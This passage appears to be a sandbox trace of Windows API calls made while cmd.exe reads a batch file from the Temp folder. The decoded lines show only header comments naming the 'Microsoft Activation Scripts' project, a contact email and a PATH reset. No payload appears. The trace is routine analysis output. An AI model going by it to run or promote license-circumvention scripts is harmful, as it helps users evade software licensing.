(in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.483] SetFilePointer (in: hFile=0x88, lDistanceToMove=498, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1f2 [0174.483] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=":: Email: windowsaddict@protonmail.com\r\n", cbMultiByte=45, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr=":: Email: windowsaddict@protonmail.com\r\nvation-Scripts' (MAS) project.\r\n=\r\nn. \r\n") returned 45 [0174.483] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.483] GetFileType (hFile=0x88) returned 0x1 [0174.483] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.483] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1f2 [0174.483] GetProcessHeap () returned 0x19a8f1e0000 [0174.483] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fb800 [0174.483] GetProcessHeap () returned 0x19a8f1e0000 [0174.484] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fb800) returned 1 [0174.484] _tell (_FileHandle=3) returned 498 [0174.484] _close (_FileHandle=3) returned 0 [0174.484] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.484] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.484] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.484] SetFilePointer (in: hFile=0x88, lDistanceToMove=498, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1f2 [0174.484] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.485] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1f2 [0174.485] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.488] SetFilePointer (in: hFile=0x88, lDistanceToMove=502, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1f6 [0174.488] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="::\r\n", cbMultiByte=4, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="::\r\n Email: windowsaddict@protonmail.com\r\nvation-Scripts' (MAS) project.\r\n=\r\nn. \r\n") returned 4 [0174.489] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.489] GetFileType (hFile=0x88) returned 0x1 [0174.489] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.489] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1f6 [0174.489] GetProcessHeap () returned 0x19a8f1e0000 [0174.489] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fb800 [0174.489] GetProcessHeap () returned 0x19a8f1e0000 [0174.489] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fb800) returned 1 [0174.489] _tell (_FileHandle=3) returned 502 [0174.489] _close (_FileHandle=3) returned 0 [0174.490] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.490] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.490] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.490] SetFilePointer (in: hFile=0x88, lDistanceToMove=502, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1f6 [0174.490] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.490] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1f6 [0174.490] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.490] SetFilePointer (in: hFile=0x88, lDistanceToMove=582, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x246 [0174.490] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="::============================================================================\r\n", cbMultiByte=80, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="::============================================================================\r\nn. \r\n") returned 80 [0174.491] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.491] GetFileType (hFile=0x88) returned 0x1 [0174.491] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.491] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x246 [0174.491] GetProcessHeap () returned 0x19a8f1e0000 [0174.491] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fb800 [0174.491] GetProcessHeap () returned 0x19a8f1e0000 [0174.491] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fb800) returned 1 [0174.491] _tell (_FileHandle=3) returned 582 [0174.491] _close (_FileHandle=3) returned 0 [0174.492] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.492] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.492] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.492] SetFilePointer (in: hFile=0x88, lDistanceToMove=582, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x246 [0174.492] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.492] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x246 [0174.492] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.492] SetFilePointer (in: hFile=0x88, lDistanceToMove=584, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0174.492] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n============================================================================\r\nn. \r\n") returned 2 [0174.492] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.492] GetFileType (hFile=0x88) returned 0x1 [0174.492] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.492] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0174.493] GetProcessHeap () returned 0x19a8f1e0000 [0174.493] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fb800 [0174.493] GetProcessHeap () returned 0x19a8f1e0000 [0174.493] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fb800) returned 1 [0174.493] _tell (_FileHandle=3) returned 584 [0174.493] _close (_FileHandle=3) returned 0 [0174.494] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.494] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.494] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.494] SetFilePointer (in: hFile=0x88, lDistanceToMove=584, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0174.494] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.494] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0174.494] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.494] SetFilePointer (in: hFile=0x88, lDistanceToMove=586, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x24a [0174.494] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n============================================================================\r\nn. \r\n") returned 2 [0174.494] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.494] GetFileType (hFile=0x88) returned 0x1 [0174.494] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.494] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x24a [0174.495] GetProcessHeap () returned 0x19a8f1e0000 [0174.495] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fb800 [0174.495] GetProcessHeap () returned 0x19a8f1e0000 [0174.495] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fb800) returned 1 [0174.495] _tell (_FileHandle=3) returned 586 [0174.495] _close (_FileHandle=3) returned 0 [0174.495] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.496] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.496] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.496] SetFilePointer (in: hFile=0x88, lDistanceToMove=586, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x24a [0174.496] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.496] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x24a [0174.496] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.496] SetFilePointer (in: hFile=0x88, lDistanceToMove=588, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x24c [0174.496] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n============================================================================\r\nn. \r\n") returned 2 [0174.496] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.496] GetFileType (hFile=0x88) returned 0x1 [0174.496] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.496] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x24c [0174.496] GetProcessHeap () returned 0x19a8f1e0000 [0174.496] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fb800 [0174.496] GetProcessHeap () returned 0x19a8f1e0000 [0174.497] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fb800) returned 1 [0174.497] _tell (_FileHandle=3) returned 588 [0174.497] _close (_FileHandle=3) returned 0 [0174.497] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.497] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.497] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.497] SetFilePointer (in: hFile=0x88, lDistanceToMove=588, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x24c [0174.497] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.498] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x24c [0174.498] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.498] SetFilePointer (in: hFile=0x88, lDistanceToMove=728, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2d8 [0174.498] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="::========================================================================================================================================\r\n", cbMultiByte=140, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="::========================================================================================================================================\r\n") returned 140 [0174.498] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.498] GetFileType (hFile=0x88) returned 0x1 [0174.498] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.498] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2d8 [0174.498] GetProcessHeap () returned 0x19a8f1e0000 [0174.498] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fb800 [0174.498] GetProcessHeap () returned 0x19a8f1e0000 [0174.498] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fb800) returned 1 [0174.499] _tell (_FileHandle=3) returned 728 [0174.499] _close (_FileHandle=3) returned 0 [0174.499] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.499] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.499] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.499] SetFilePointer (in: hFile=0x88, lDistanceToMove=728, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2d8 [0174.499] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.499] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2d8 [0174.499] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.499] SetFilePointer (in: hFile=0x88, lDistanceToMove=730, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2da [0174.500] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n========================================================================================================================================\r\n") returned 2 [0174.500] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.500] GetFileType (hFile=0x88) returned 0x1 [0174.500] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.500] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2da [0174.500] GetProcessHeap () returned 0x19a8f1e0000 [0174.500] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fb800 [0174.500] GetProcessHeap () returned 0x19a8f1e0000 [0174.500] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fb800) returned 1 [0174.501] _tell (_FileHandle=3) returned 730 [0174.501] _close (_FileHandle=3) returned 0 [0174.502] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.502] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.502] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.502] SetFilePointer (in: hFile=0x88, lDistanceToMove=730, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2da [0174.502] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.502] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2da [0174.502] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.502] SetFilePointer (in: hFile=0x88, lDistanceToMove=800, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x320 [0174.502] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=":: Set Path variable, it helps if it is misconfigured in the system\r\n", cbMultiByte=70, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr=":: Set Path variable, it helps if it is misconfigured in the system\r\n====================================================================\r\n") returned 70 [0174.502] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.502] GetFileType (hFile=0x88) returned 0x1 [0174.502] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.502] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x320 [0174.502] GetProcessHeap () returned 0x19a8f1e0000 [0174.502] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fb800 [0174.502] GetProcessHeap () returned 0x19a8f1e0000 [0174.503] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fb800) returned 1 [0174.504] _tell (_FileHandle=3) returned 800 [0174.504] _close (_FileHandle=3) returned 0 [0174.504] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.504] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.504] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.504] SetFilePointer (in: hFile=0x88, lDistanceToMove=800, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x320 [0174.504] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.504] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x320 [0174.504] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.504] SetFilePointer (in: hFile=0x88, lDistanceToMove=802, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x322 [0174.505] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n Set Path variable, it helps if it is misconfigured in the system\r\n====================================================================\r\n") returned 2 [0174.505] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.505] GetFileType (hFile=0x88) returned 0x1 [0174.505] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.505] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x322 [0174.505] GetProcessHeap () returned 0x19a8f1e0000 [0174.505] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fb800 [0174.505] GetProcessHeap () returned 0x19a8f1e0000 [0174.505] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fb800) returned 1 [0174.505] _tell (_FileHandle=3) returned 802 [0174.505] _close (_FileHandle=3) returned 0 [0174.506] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.506] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.506] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.506] SetFilePointer (in: hFile=0x88, lDistanceToMove=802, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x322 [0174.506] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.506] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x322 [0174.506] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.506] SetFilePointer (in: hFile=0x88, lDistanceToMove=909, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x38d [0174.506] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"PATH=%SystemRoot%\\System32;%SystemRoot%\\System32\\wbem;%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\\"\r\n", cbMultiByte=107, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="set \"PATH=%SystemRoot%\\System32;%SystemRoot%\\System32\\wbem;%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\\"\r\n===============================\r\n") returned 107 [0174.506] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.506] GetFileType (hFile=0x88) returned 0x1 [0174.506] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.506] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x38d [0174.506] GetProcessHeap () returned 0x19a8f1e0000 [0174.506] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fb800 [0174.507] GetProcessHeap () returned 0x19a8f1e0000 [0174.507] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f1ff820 [0174.507] GetProcessHeap () returned 0x19a8f1e0000 [0174.507] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x26) returned 0x19a8f1eb920 [0174.507] GetEnvironmentVariableW (in: lpName="SystemRoot", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0xa [0174.507] GetProcessHeap () returned 0x19a8f1e0000 [0174.508] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb920) returned 1 [0174.508] GetProcessHeap () returned 0x19a8f1e0000 [0174.508] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ff820) returned 1 [0174.508] GetProcessHeap () returned 0x19a8f1e0000 [0174.508] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f1ff820 [0174.508] GetProcessHeap () returned 0x19a8f1e0000 [0174.508] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x26) returned 0x19a8f1eb6e0 [0174.508] GetEnvironmentVariableW (in: lpName="SystemRoot", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0xa [0174.508] GetProcessHeap () returned 0x19a8f1e0000 [0174.508] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6e0) returned 1 [0174.508] GetProcessHeap () returned 0x19a8f1e0000 [0174.509] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ff820) returned 1 [0174.509] GetProcessHeap () returned 0x19a8f1e0000 [0174.509] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f1ff820 [0174.509] GetProcessHeap () returned 0x19a8f1e0000 [0174.509] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x26) returned 0x19a8f1eb740 [0174.509] GetEnvironmentVariableW (in: lpName="SystemRoot", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0xa [0174.509] GetProcessHeap () returned 0x19a8f1e0000 [0174.509] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb740) returned 1 [0174.509] GetProcessHeap () returned 0x19a8f1e0000 [0174.510] 